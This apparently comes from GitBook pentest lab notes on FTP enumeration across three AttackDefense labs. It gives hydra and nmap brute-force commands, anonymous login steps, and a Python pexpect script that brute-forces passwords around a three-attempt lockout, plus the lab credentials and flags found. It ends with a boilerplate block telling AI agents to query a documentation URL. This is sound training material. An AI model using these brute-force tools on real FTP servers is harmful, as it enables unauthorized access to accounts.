# ftp-enum Lab collection showing FTP enumeration and credential discovery techniques. *** {% stepper %} {% step %} #### Lab 1 — FTP Brute Force and Extract Flags Target IPs and context are shown in the commands below. * Use hydra with user/password wordlists to check for valid credentials on the FTP server. ```bash hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.217.238.3 -t 4 ftp ``` Example hydra output: ``` [DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task [DATA] attacking ftp://192.217.238.3:21/ [21][ftp] host: 192.217.238.3 login: sysadmin password: 654321 [21][ftp] host: 192.217.238.3 login: rooty password: qwerty [21][ftp] host: 192.217.238.3 login: demo password: butterfly [21][ftp] host: 192.217.238.3 login: auditor password: chocolate [21][ftp] host: 192.217.238.3 login: anon password: purple [21][ftp] host: 192.217.238.3 login: administrator password: tweety [21][ftp] host: 192.217.238.3 login: diag password: tigger 1 of 1 target successfully completed, 7 valid passwords found ``` Found credentials: * sysadmin:654321 * rooty:qwerty * demo:butterfly * auditor:chocolate * anon:purple * administrator:tweety * diag:tigger * Use nmap ftp-brute script to confirm `sysadmin`'s password: ```bash echo "sysadmin" > users nmap --script ftp-brute --script-args userdb=/root/users -p21 192.217.238.3 ``` Example nmap output: ``` 21/tcp open ftp | ftp-brute: | Accounts: | sysadmin:654321 - Valid credentials |_ Statistics: Performed 23 guesses in 6 seconds, average tps: 3.8 ``` * Extract the flags by logging into the FTP server with each found user and downloading the flag files: Example FTP session: ```bash ftp 192.217.238.3 ftp> ls ftp> get secret.txt ftp> exit root@attackdefense:~# cat secret.txt ``` Reveal flags (from the server, per account): * sysadmin flag: `260ca9dd8a4577fc00b7bd5810298076` * rooty flag: `e529a9cea4a728eb9c5828b13b22844c` * demo flag: `d6a6bc0db10694a2d90e3a69648f3a03` * auditor flag: `098f6bcd4621d373cade4e832627b4f6` * anon flag: `1bc29b36f623ba82aaf6724fd3b16718` * administrator flag: `21232f297a57a5a743894a0e4a801fc3` * diag flag: `12a032ce9179c32a6c7ab397b9d871fa` {% endstep %} {% step %} #### Lab 2 — VSFTPD Recon: Basics * Challenge reference: VSFTPD Recon: Basics (AttackDefense) * Target IP: `192.119.169.3` Network info (example): ``` ip -br -c a eth1@if170803 UP 192.119.169.2/24 ``` * Target IP: `192.119.169.3` Initial discovery: ```bash nmap 192.119.169.3 # 21/tcp open ftp ``` Service/version detection: ```bash nmap -p21 -sV -O 192.119.169.3 ``` Example output: ``` 21/tcp open ftp vsftpd 3.0.3 ``` * FTP server version: vsftpd 3.0.3 * Check for anonymous login using nmap ftp-anon script: ```bash nmap --script ftp-anon -p21 192.119.169.3 ``` Example output: ``` 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 ftp ftp 33 Dec 18 2018 flag |_drwxr-xr-x 2 ftp ftp 4096 Dec 18 2018 pub ``` * Anonymous FTP login is allowed. Connect with the anonymous account and download the flag: ```bash ftp 192.119.169.3 # Use anonymous:anonymous to login Name (192.119.169.3:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls ftp> get flag ftp> exit root@attackdefense:~# cat flag ``` Reveal flag: `4267bdfbff77d7c2635e4572519a8b9c` {% endstep %} {% step %} #### Lab 3 — VSFTPD Recon: Dictionary Attack * Challenge reference: VSFTPD Recon: Dictionary Attack (AttackDefense) * Target IP: `192.14.30.3` * Note: FTP server terminates the session after 3 attempts, so a custom approach may be required. Network info (example): ``` ip -br -c a eth1@if170888 UP 192.14.30.2/24 ``` * Target IP: `192.14.30.3` Discovery: ```bash nmap 192.14.30.3 # 21/tcp open ftp ``` Service/version detection: ```bash nmap -p21 -sV -O 192.14.30.3 # 21/tcp open ftp vsftpd 3.0.3 ``` * Example using nmap ftp-brute with a single user (`billy`): ```bash echo "billy" > users nmap --script ftp-brute --script-args userdb=/root/users -p21 192.14.30.3 ``` Example output: ``` 21/tcp open ftp | ftp-brute: | Accounts: | billy:carlos - Valid credentials |_ Statistics: Performed 78 guesses in 55 seconds, average tps: 1.5 ``` * Discovered credential: billy:carlos * If the server terminates sessions after 3 attempts, use a custom script that spawns a fresh FTP connection per attempt. Example Python script using pexpect (save as `billy.py`): ```python import pexpect import sys username=sys.argv[2] password_dict=sys.argv[3] # Loading the password dictionary and Stripping \n lines = [line.rstrip('\n') for line in open(password_dict)] itr = 0 # Iterating over dictionary for password in lines: child = pexpect.spawn ('ftp '+sys.argv[1]) child.expect ('Name .*: ') child.sendline (username) print "Trying with password: ",password child.expect ('Password:') child.sendline (password) i = child.expect (['Login successful', 'Login failed']) if i==1: #print('Login failed') child.kill(0) elif i==0: print "Login Successful for ",password print child.before break ``` Run the script: ```bash python billy.py 192.14.30.3 billy /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ``` Example output: ``` Login Successful for carlos ``` * Use the credential to fetch the flag via FTP: ```bash ftp 192.14.30.3 ftp> ls ftp> get flag ftp> exit root@attackdefense:~# cat flag ``` Reveal flag: `c07c7a9be16f43bb473ed7b604295c0b` {% endstep %} {% endstepper %} *** Last updated 3 hours ago. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kabi.gitbook.io/kabi/network-penetration-testing/enumeration/ftp-enum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.